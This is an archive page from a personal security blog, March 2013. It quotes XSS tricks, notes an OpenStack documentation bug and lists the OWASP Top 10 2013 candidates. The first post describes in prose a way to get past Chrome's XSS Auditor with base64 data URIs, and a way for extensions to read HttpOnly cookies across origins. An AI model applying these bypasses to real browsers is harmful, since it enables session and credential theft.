Mike's Security Cabinet: March 2013

Wednesday, March 13, 2013

This post http://blog.nibblesec.org/2013/03/subverting-cloud-based-infrastructure.html shares a couple of good XXS tricks:

Choosing Google Chrome as target browser required to bypass XSS Auditor, the integrated Anti-XSS filter. As discovered by Mario Heiderich, the data URI schema with base64 content can be leverage to bypass the filter.

A Chrome extension can override default SOP restrictions and issue cross-domain requests reading the HTTP response, accessing other browser tabs, and also reading every cookie including those marked as HttpOnly.
JS injection:

Just wasted an hour trying to figure out why I can not get open stack console to work. It turned out that the documentation has a bug.

I found this post

https://bugs.launchpad.net/openstack-manuals/+bug/979054

After the bug was reported a year ago, the mistake is still in their documentation:

http://docs.openstack.org/essex/openstack-compute/admin/content/accessing-vnc-consoles-with-a-java-client.html

Documentation is important! Accurate documentation is more important!!

OWASP Top 10 - 2013 Release Candidate includes some changes to the current 2010 edition:

A1 Injection
A2 Broken Authentication and Session Management (was formerly A3)
A3 Cross-Site Scripting (XSS) (was formerly A2)
A4 Insecure Direct Object References
A5 Security Misconfiguration (was formerly A6)
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection)
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access)
A8 Cross-Site Request Forgery (CSRF) (was formerly A5)
A9 Using Known Vulnerable Components (new but was part of former A6 Security Misconfiguration)
A10 Unvalidated Redirects and Forwards